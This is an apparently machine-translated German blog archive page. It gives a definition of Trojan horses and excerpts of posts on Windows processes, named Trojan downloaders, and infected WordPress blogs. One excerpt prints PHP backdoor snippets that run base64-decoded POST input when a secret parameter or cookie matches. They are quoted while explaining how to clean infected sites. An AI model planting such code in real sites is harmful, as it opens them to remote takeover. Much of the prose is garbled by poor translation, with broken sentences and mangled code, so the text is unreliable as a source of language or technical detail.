Ein Trojanisches Pferd oder Trojaner, ist eine Art von Malware tarnt sich als eine legitime Diese Datei oder hilfreiche Software mit dem ultimativen Ziel der Gewährung von Hacker Unberechtigter Zugriff auf einen Computer. Trojaner versuchen Sie nicht, sich in andere Dateien zu injizieren wie ein Computer-Virus. Trojanische Pferde können Kopien von sich selbst zu machen, Informationen zu stehlen oder Schaden systems.Many Ihre Host-Computer Trojaner basieren auf Drive-by-Downloads oder Online-Spiele oder über das Internet-gestützte Anwendungen, um die Zielcomputer zu erreichen installieren. Der Begriff stammt aus dem Trojanischen Pferd Geschichte in der griechischen Mythologie abgeleitet Weil Trojanische Pferde eine Form der Beschäftigen "social engineering", präsentieren sich als harmlose, nützliche Geschenke, um Opfer zu überreden, sie auf ihren Computern installieren.

Anzeigen

Achtung, neue Arten von Malware: Microsoft hat einen Trojaner gefunden und Löschen einzelner Tracks, die

Nach ein paar Tagen hat Microsoft angekündigt, dass ein Team von Forschern aus dem Malware Protection Center hat einen neuen Trojaner namens Trojandownloader entdeckt: Win32 / Nemim.gen A, in der Lage, einzelne Dateien zu löschen heruntergeladen Malware an nicht erkannt werden. Microsoft sagt, dass dieses Verhalten fast unmöglich Trojan Isolierung und Analyse-Dateien ist, dass [...]

Anzeigen

Hldrrr.exe - Entfernen von Spyware Virus (wintems.exe, srosa.sys)

Hldrrr.exe wird von den meisten Anti-Virus als Spyware oder Trojaner-Downloader.Win32.Bagle.sn bekannt, verpasste aber Zeit und noch loswerden bekannte Anti-Virus wie Norton und Avira. Vor ein paar Tagen hatte ich eine wunderbare Erfahrung mit dieser ausführbaren Datei - Virus. Wenn Sie auf Ihre PCs erfüllen müssen sicher sein, dass Ihr Computer-Virus ist und [...]

Ccc.exe (ATI Catalyst Control Center)

ATI Catalyst Control Center (ccc.exe) ist ein Programm, mit dem Sie verschiedene Anzeigemodi von ATI Video Card vorgesehen (z. B. die Erstellung von Verknüpfungen zu verschiedenen Arten von Einstellungen oder mehrere Profile anpassen können, die jeweils der Teil entsprechend den unterschiedlichen Anforderungen, zB. Einstellungen für ein bestimmtes Spiel, etc.). Wenn [...]

Lsass.exe vs Sasser.exe (Local Security Authority Subsystem Service vs Worm)

Lsass.exe oder Local Security Authority Subsystem Service ist ein Prozess der integrierten Microsoft Windows OS, verantwortlich für die Überprüfung der Echtheit des Benutzer-Login Informationen, wann immer sie auf das System zugreifen wollen. Lsass.exe verhindert den Zugriff auf persönliche Daten von anderen registrierten Nutzer des Systems (oder nicht) ist dieser Prozess [...]

dllhost.exe (Microsoft DCOM DLL Host Process)

Wenn ein Routine-Check (empfohlen für "Gesundheit" Ihres Systems ;)) über dllhost.exe Prozess geben läuft nestingheritin System keine Sorge (zu viel). Dieser Prozess gehört zur Microsoft und wird von ihm in allen Windows-Betriebssystemen (OS-Datei initialisiert - das ist der Prozess von Windows ausgeführt wird, um bei jedem Systemstart ausgeführt wird) integriert. Dllhost.exe [...]

Winlogon.exe (Microsoft Windows Logon Prozess vs Trojan / Virus)

Winlogon.exe ist ein Prozess der integrierten Microsoft Windows-Betriebssystem und ist für die Authentifizierung erforderlich (Login / Logout) der Anwender das System oder seine Aktivierung (das System) zu überprüfen. Außerdem Winlogon ist auch verantwortlich für den Schutz des Systems ermöglicht eine genaue Abgrenzung Registrierte Benutzer (zB Benutzer-Administrator hat die volle Kontrolle und regelmäßige Nutzer von [...]

Trojan-Downloader.Win32.Agent.yul - Google Toolbar für IE Beta 8 2

Ich habe vor kurzem installierten Internet Explorer Beta 8 2 (IE 8). Seit einigen Monaten, mit Standard-Browser Flock, aber es ... neues Produkt ... Ich habe IE 8 getestet. :-) IE 8 vielversprechend, hat aber einige Probleme korrigiert Anzeige von Bildern auf seine Inhalte und Websites. Es geschieht auf einigen Blogs, um [...]

zilnice.ro, @ Trojaner Malware?

Wir fanden ein paar Minuten vor einem Backlink von Blog zilnice.ro (nicht Zugriffsadresse): Der Blog ist beschädigt, oder zumindest glaube ich - Täglich http: //zilnice.ro/zilnice/blogul-is-virus-sau ... | IP [...] Ich habe es StealthSettings Post, begann ich, wie gefährlich sind diese Viren, und dachte, wie gut [...] Ich hoffe, dass [...]

WordPress Exploit - Säubern infizierter Dateien und SQL Server-Sicherheit.

Bevor Sie diesen Artikel lesen können, sollten Sie Artikel hier sehen, um etwas zu verstehen. :) Ich fand mehrere Dateien von Blogs auf stealthsettings.com Codes ähnlich denen unter, die sich aus der virusarii mit Wordpress Exploit-Code:. <? Php if ($ _ GET ['573abcb060974771'] == " 8e96d1b4b674e1d2 ") {eval (base64_decode ($ _ POST ['file'])); Ausgang; }> Und <? Php if ($ _ COOKIE ['44e827f9fbeca184'] == "5cd3c94b4b1c57ea") {eval (base64_decode ($ _ POST ['file']))?; Ausgang; } [...]

Was, wenn Sie keine Viren oder Blog mit Google Search zu finden. (WordPress Virus)

Bezüglich meinem letzten Beitrag, über den Virus beeinflussen WordPress über 50% der Blogs auf der ganzen Welt denken, versuche ich, die einfachste Methode, die überprüfen, ob ein Blog von diesem Virus betroffen ist geben kann. Wir wählten eine zufällige Blog diese Demonstration zu machen. : Denisuca.com. 1. Öffnen Sie [...]

ArabicBulgarianChinese (Simplified)Chinese (Traditional)CroatianCzechDanishDutchEnglishEstonianFinnishFrenchGermanGreekHebrewHindiHungarianIndonesianIrishItalianJapaneseKoreanLatvianLithuanianNorwegianPolishPortugueseRomanianRussianSerbianSlovakSlovenianSpanishSwedishThaiTurkishUkrainianVietnamese